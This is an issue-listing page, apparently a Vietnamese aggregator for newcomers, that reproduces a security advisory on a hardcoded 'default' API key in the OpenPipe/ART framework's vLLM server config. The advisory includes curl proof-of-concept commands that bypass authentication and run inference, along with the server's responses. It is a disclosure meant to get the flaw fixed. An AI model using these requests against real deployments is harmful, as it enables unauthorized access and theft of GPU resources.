[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass
Maintainer thường phản hồi trong vòng 3 ngày
Chưa có ai nhận issue này.
Đánh giá
- Độ khó
- 3/5
- Thời gian dự kiến
- 1-2 ngày
- Mức phù hợp với người mới
- 52/100
Hướng nghiên cứu
Đọc src/art/dev/openai_server.py và hàm get_openai_server_config, tập trung vào việc khởi tạo ServerArgs và cách xử lý api_key. Tái hiện các yêu cầu được ghi lại trong tài liệu đối với endpoint vLLM cục bộ, sau đó xác minh rằng thông tin xác thực mặc định có thể dự đoán được không còn cấp quyền truy cập, trong khi xác thực hợp lệ đã được cấu hình vẫn hoạt động.
Do mô hình lập chỉ mục viết ra từ nội dung của issue.
Mô tả
Advisory Details
Title: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass
Description:
Summary
A hardcoded credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally initializes the built-in vLLM OpenAI-compatible server with a default API key set to "default". This allows any unauthenticated user with network access to the service to bypass authentication, consume LLM inference resources, and query sensitive model deployment information.
Details
In src/art/dev/openai_server.py, the get_openai_server_config function is responsible for orchestrating the setup of the internal vLLM server. The ServerArgs data structure is instantiated with a hardcoded api_key="default".
Because this API key is statically assigned and passed to the vLLM engine at startup without automatically generating a secure random token or enforcing a required user-defined key, the vLLM server's internal authentication middleware consistently accepts Authorization: Bearer default for all incoming REST API requests.
PoC
-
Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g.,
8000). -
Step 1 — Confirm auth bypass (list models with hardcoded key):
curl -s http://<target>:8000/v1/models \
-H "Authorization: Bearer default" | python3 -m json.tool
- Step 2 — Demonstrate actual harm (unauthorized inference / GPU resource theft):
curl -s http://<target>:8000/v1/chat/completions \
-H "Authorization: Bearer default" \
-H "Content-Type: application/json" \
-d '{
"model": "Qwen/Qwen1.5-0.5B",
"messages": [{"role": "user", "content": "What is the capital of France?"}],
"max_tokens": 64
}' | python3 -m json.tool
- Step 3 — Negative test (wrong key is correctly rejected, proving auth middleware is active):
curl -i http://<target>:8000/v1/models \
-H "Authorization: Bearer wrong-key"
Log of Evidence
Step 1 — Auth bypass succeeds (model listing):
{
"object": "list",
"data": [
{
"id": "Qwen/Qwen1.5-0.5B",
"object": "model",
"created": 1774020077,
"owned_by": "organization",
"permission": []
}
]
}
Step 2 — Unauthorized inference succeeds (GPU resource theft):
{
"id": "chatcmpl-583d9a951ae8",
"object": "chat.completion",
"created": 1774020077,
"model": "Qwen/Qwen1.5-0.5B",
"choices": [
{
"index": 0,
"message": {
"role": "assistant",
"content": "The capital of France is Paris..."
},
"finish_reason": "stop"
}
],
"usage": {
"prompt_tokens": 30,
"completion_tokens": 36,
"total_tokens": 66
}
}
The model processed the attacker's prompt and returned a valid inference result, proving the attacker can consume GPU compute resources at will without any legitimate credentials.
Step 3 — Wrong key is rejected (auth middleware is active):
HTTP/1.1 401 Unauthorized
content-type: application/json
{"error":{"message":"Unauthorized","type":"invalid_api_key"}}
This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value ("default"), not that authentication is missing.
Impact
This is an Improper Authentication / Use of Hardcoded Credentials vulnerability. Any attacker able to route traffic to the listening port can entirely bypass the API authentication layer to make arbitrary LLM inference requests. This leads to severe resource exhaustion, financial quota depletion, Denial of Service (DoS) by maxing out GPU computation capabilities, and potential unauthorized reconnaissance of hosted models.
Affected products
- Ecosystem: python
- Package name: art
- Affected versions: <= latest
- Patched versions:
Severity
- Severity: High
- Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Weaknesses
- CWE: CWE-798: Use of Hard-coded Credentials
Occurrences
| Permalink | Description |
|---|---|
| https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30 | The ServerArgs initialization forcefully sets api_key="default", causing the deployed vLLM instance to blindly accept this default key for all privileged API interactions. |
- Ngôn ngữ chính
- Python
- Star
- 10.8k
- Fork
- 989
- Merge trung bình
- 11 giờ 38 phút
- Pull request đã merge (30 ngày)
- 104
Chuẩn bị môi trường
Bắt đầu từ đâu
- Đọc hết issue, rồi đọc hướng dẫn đóng góp của dự án.
- Bình luận trên issue rằng bạn sẽ nhận — tránh hai người làm cùng một việc.
- Fork repository và làm thay đổi trên một nhánh.
- Mở pull request có tham chiếu số hiệu của issue.
Issue khác của OpenPipe/ART
-
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 72/100
Maintainer thường phản hồi trong vòng 3 ngày
-
Độ khó 4/5 3-5 ngày Mức phù hợp với người mới 54/100
OpenPipe/ART#961 · 3 bình luận ·
Maintainer thường phản hồi trong vòng 3 ngày
-
Độ khó 5/5 Hơn một tuần Mức phù hợp với người mới 25/100
OpenPipe/ART#949 · 5 bình luận ·
Maintainer thường phản hồi trong vòng 3 ngày
-
Độ khó 5/5 Hơn một tuần Mức phù hợp với người mới 10/100
Maintainer thường phản hồi trong vòng 3 ngày
-
Độ khó 5/5 Hơn một tuần Mức phù hợp với người mới 42/100
Maintainer thường phản hồi trong vòng 3 ngày
Issue tương tự
-
Broken links found in docsĐang mởdocs pydanty:is-working
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 75/100
pydantic/pydantic-ai#8863 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 68/100
run-llama/llama_index#23278 ·
Maintainer thường phản hồi trong vòng 2 ngày
-
documentation from-review-extraction github-actions priority: low severity:nit
Độ khó 1/5 Dưới một giờ Mức phù hợp với người mới 92/100
LearningCircuit/local-deep-research#6946 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
Độ khó 2/5 1-3 giờ Mức phù hợp với người mới 82/100
oracle/langchain-oracle#323 ·
Maintainer thường phản hồi trong vòng 1 ngày
-
Độ khó 1/5 Dưới một giờ Mức phù hợp với người mới 88/100
tenstorrent/tt-metal#58057 · 1 bình luận ·
Maintainer thường phản hồi trong vòng 1 ngày